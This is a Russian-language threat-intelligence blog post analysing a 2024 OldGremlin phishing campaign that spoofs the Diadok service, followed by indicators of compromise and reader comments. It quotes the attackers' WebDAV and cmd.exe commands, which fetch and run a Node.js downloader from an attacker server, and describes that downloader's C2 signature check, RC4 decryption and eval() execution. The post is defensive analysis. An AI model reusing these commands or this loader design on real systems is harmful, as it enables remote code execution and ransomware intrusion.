Группировка вымогателей OldGremlin сеяла страх среди российских компаний в 2020-2022 годах, суммы требуемых выкупов исчислялись миллионами, а в 2022 году в одной из атак ценник поднялся до 1 миллиарда рублей. Мы писали об атакующих в исследованиях, например, здесь и здесь.

Группа была неактивна с сентября 2022 года, или по крайней мере не попадала в наше поле зрения. Но вот почти спустя два года злоумышленники снова дали знать о себе. Специалисты F.A.C.C.T. проанализировали новую рассылку и новый инструмент атакующих – OldGremlin.JsDownloader. О новых открытиях, связанных с известной группировкой вымогателей, рассказал специалист по анализу вредоносного кода департамента Threat Intelligence компании F.A.C.C.T. Артем Грищенко.

Письмо от “Диадок”

Аналитики компании F.A.C.C.T. обнаружили загруженное на платформу AnyRun электронное письмо, которое было отправлено от имени сотрудницы компании “Диадок” с использованием адреса электронной почты - Ольга Макарова <makarova@diadok[.]net>. Получателем письма являлся сотрудник крупной российской нефтехимической компании.

Письмо было отправлено 12 августа 2024 года и имело тему "Уведомление из Диадок: документы требуют вашего участия".

 Электронное письмо, которое было отправлено якобы от компании “Диадок”
Электронное письмо, которое было отправлено якобы от компании “Диадок”

Домен @diadok[.]net, с которого было отправлено вредоносное письмо, мимикрирует под оригинальный домен компании “Контур.Диадок” - diadoc[.]ru.

Это сразу же привлекло наше внимание, поскольку ранее мимикрия под “Диадок” встречалась в атаках не кого иного, как OldGremlin.

Письмо содержало URL-ссылку (hxxps://diadok[.]net/1ealfus19t) для скачивания файла "счет-фактура.xlsx". После перехода по ссылке будет загружен архив Счет_фактура_от-09-09-2024[.]zip (SHA1: 3e01aae56dc2fac3506987197f48db65423717f9), содержащий LNK-файл "Счет_фактура_от-09-08-2024.xlsx.lnk" (SHA1: a36034740e659fdd06b5827382317965a26b4121). После запуска произойдет подключение к WebDav-серверу (46[.]101[.]122[.]204) и на стороне клиента (в данном случае жертвы) будет выполнена команда:

\\46[.]101[.]122[.]204\DavWWWRoot\node.exe \\46[.]101[.]122[.]204\DavWWWRoot\word.txt

WebDAV (Web Distributed Authoring and Versioning) – это набор расширений и дополнений к протоколу HTTP, поддерживающих совместную работу пользователей над редактированием файлов и управление файлами на удаленных веб-серверах.

Аналитики F.A.C.C.T. сразу же отметили, что ранее WebDAV встречался в атаках OldGremlin.

Загруженный файл node.exe (SHA1: 2826f7ac33b43439ecddd08ad541a7f54a9eb7c0) является Node.js интерпретаторов версии v0.10.48 и доступен для загрузки с официального сайта Node.js (hxxps://nodejs[.]org/) по ссылке hxxps://nodejs[.]org/dist/v0.10.48/node.exe.

И вот еще одно совпадение: в предыдущих атаках OldGremlin также использовались   Node.js интерпретаторы.

Файл word.txt (SHA1: ae22b79a3f55d8fc9c1b78a9cb008fff1c104901) является JavsScript-сценарием, который после запуска выполнит команду в интерпретаторе команд Windows:

cmd.exe /c start /b \\46[.]101[.]122[.]204\DavWWWRoot\schet_faktura-20240811.xlsx

В результате выполнения команды будет открыт XLS-файл приманка с именем schet_faktura-20240811.xlsx (SHA1: ad9e9f1365ad547b7c2eb91717b0cebeefb0e18e), доступный по WebDav-пути: \\46[.]101[.]122[.]204\DavWWWRoot\schet_faktura-20240811.xlsx.

Документ-приманка
Документ-приманка

Далее, в контексте текущего процесса JavaScript-сценария, будет запущен дочерний процесс Node.js с использованием команды:

\\46[.]101[.]122[.]204\DavWWWRoot\node\node.exe \\46[.]101[.]122[.]204\DavWWWRoot\word.txt 1

В контексте данного процесса используется файл, расположенный на WebDav-сервере по файловому пути node\node.exe (SHA1: df0dd64c6075a33546ea265b63d8eb153476a9b0). Данный файл отличается от предыдущего node.exe тем, что является другой версией интерпретатора Node.js - v12.22.12, и доступен для скачивания с официального сайта Node.js (https://nodejs[.]org/) по ссылке https://nodejs[.]org/dist/v12.22.12/win-x86/node.exe. Также в данном процессе присутствует аргумент запуска - "1", который используется для изменения поведения сценария. Вместо запуска XLS-файла приманки и очередного дочернего процесса, файл декодирует и запустит JavaScript-сценарий (OldGremlin.JsDownloader). Данный сценарий расположен внутри файла word.txt в Base64 виде. 

Анализ инструмента атакующих - OldGremlin.JsDownloader

JavaScript-сценарий (OldGremlin.JsDownloader) был классифицирован нами как Downloader, в задачи которого входит загрузка и выполнение произвольных JavaScript-сценариев.

Данный скрипт исполняется в виде анонимной функции. После того как она будет запущена, выполнится подключение к серверу 157[.]230[.]18[.]205:80, после чего на C2-сервер будет отправлен случайно сгенерированный набор данных размером 32 байта. Полученным ответом является подпись отправленного набора данных. Далее выполнится проверка полученной подписи с заданными параметрами публичного ключа:

{
	format: "der",
	type: "spki",
	key: Buffer.from("MCowBQYDK2VwAyEAnUWQ2w5AfqWmgJaet7RQI1smO6EPHQHl+zSaWrZtqdc=","base64")
}

В случае, если проверка подписи прошла успешно, OldGremlin.JsDownloader будет ожидать данных от C2-сервера. После того как вредоносный загрузчик получит данные от сервера, они будут расшифрованы и переданы в функцию eval(), которая позволяет выполнить произвольный JavaScript-код. Алгоритм шифрования данных - RC4, где ключом является хеш-сумма MD5, полученная от случайно сгенерированного набора байт, который был отправлен на сервер ранее.

Выводы

Исходя из имеющихся техник, тактик и процедур, выявленных в новой атаке, мы предполагаем, что за атакой стоит группировка OldGremlin.

Индикаторы компрометации

Файлы

Архивы

Filename

schet-faktura-090824.zip

MD5

c646da3030757f47ef82eab03d3245fd

SHA1

0e639b57368307a37e86ecb592288e9c1104adaf

SHA256

f81888a42559c255758607e4b5feff8fc2ea7aa6c01f357fad7a55a3e5fdf156

Filename

Счет_фактура_от-09-09-2024.zip

MD5

b95542a071fa6333b9ab7122b946fd26

SHA1

3e01aae56dc2fac3506987197f48db65423717f9

SHA256

54705074b10f9734ed2ff4573459ac89b9b56a7e5d92cf14a3d32e6a8c4e8211

Filename

schet-faktura-august.zip

MD5

1f9af632ef695fe9a93e3195a337fcd9

SHA1

c3cc943333a758020722d0cf831d0786c5ccde06

SHA256

60a1dd1e63d5e11e34c70d3d40b8869e5964254e1b8caa4a64e5da9eb9d6aa15

LNK-файлы

Filename

schet-faktura-090824.xlsx.lnk

MD5

932fc8e1415488a39c8b690550102aaa

SHA1

c5e980366bf580584874d07d387555a76c460c6c

SHA256

0b5ff6ee2deb1014fab7cc45c84c7eb97b1739bd34b695fc524fc3dff06d9f2f

Filename

Счет_фактура_от-09-08-2024.xlsx.lnk

MD5

47ae2a781ed72c5dcbdf5e4169a571b1

SHA1

a36034740e659fdd06b5827382317965a26b4121

SHA256

24a6f2c50c5d6382983d2964718c554e7597f0d027377c489d8ea60852e5ea22

Filename

schet-faktura-090824.xlsx.lnk

MD5

50ee0120c92e3061eee0043cbe497f44

SHA1

7e50f326fcb584c8c25ef902c90116b7496c5c64

SHA256

4bacc8023521a6501e179d839e64ed5c3938c58b04ea2806cea29f2492c5da7b

XLSX-файл

Filename

schet_faktura-20240811.xlsx

MD5

bffd390d95c16d58886fc66ae633c884

SHA1

ad9e9f1365ad547b7c2eb91717b0cebeefb0e18e

SHA256

f11a493325098883faf249e81748eb5a471391860037dc690489314e1357fc03

JavaScript-сценарий

Filename

word.txt

MD5

7f90b7342cdee77f5bb2d7445b505eb9

SHA1

ae22b79a3f55d8fc9c1b78a9cb008fff1c104901

SHA256

2926a8602b280c049241f75caa9c6ec2fc8bd579937b0564813215501478895f

Доменные имена

  • diadok[.]net

  • 1cbit[.]org

  • diadok-documentscdn.c688de[.]com

IP-адреса

  • 165.22.80[.]171

  • 46.101.122[.]204

  • 157.230.18[.]205

URL-ссылки

  • hxxps://diadok[.]net/4qcn9ducdw

  • hxxps://1cbit[.]org/m9iuabiz

  • hxxps://1cbit[.]org/yvbo6wk6lk

  • hxxps://1cbit[.]org/wrwpf

  • hxxps://diadok[.]net/yh45dsvo

  • hxxps://1cbit[.]org/9amh

  • hxxps://diadok[.]net/g24c

  • hxxps://diadok[.]net/1ealfus19t

  • hxxps://1cbit[.]org/0mfu

  • hxxps://1cbit[.]org/wqt49

  • hxxps://diadok[.]net/4bhjk9j

  • hxxps://diadok[.]net/ciuw297j

  • hxxps://diadok[.]net/jpkkq8ccf6

  • hxxps://diadok[.]net/qmkt2da6qh

  • hxxps://1cbit[.]org/2z0zv6qms0

  • hxxp://diadok-documentscdn.c688de[.]com/

  • hxxp://diadok-documentscdn.c688de[.]com/schet_faktura-20240811.xlsx

  • hxxp://diadok-documentscdn.c688de[.]com/node.exe

  • hxxp://diadok-documentscdn.c688de[.]com/node/node.exe

  • hxxp://diadok-documentscdn.c688de[.]com/word.txt

  • hxxp://46.101.122[.]204/

  • hxxp://46.101.122[.]204/schet_faktura-20240811.xlsx

  • hxxp://46.101.122[.]204/node.exe

  • hxxp://46.101.122[.]204/node/node.exe

  • hxxp://46.101.122[.]204/word.txt

Комментарии (3)


  1. Samodelkin333
    15.08.2024 13:53

    Интересно откуда у этих К***** такой домен и .com вопрос у кого...


    1. EditorF_A_C_C_T Автор
      15.08.2024 13:53

      В том числе от оригинального домена отличается последний символ в имени:

      "Домен @diadok[.]net, с которого было отправлено вредоносное письмо, мимикрирует под оригинальный домен компании “Контур.Диадок” - diadoc[.]ru. "


  1. konturtech
    15.08.2024 13:53

    Наша команда знает о ситуации и приняла меры предосторожности: уведомила пользователей внутри сервиса, отправила предупреждающие письма и подготовила новость на сайт.

    Злоумышленники использовали бренд Контур.Диадока, но сам сервис не был задействован в атаке. Если появится дополнительная информация об инциденте, сообщим об этом на сайте и в других ресурсах компании → https://www.diadoc.ru/blog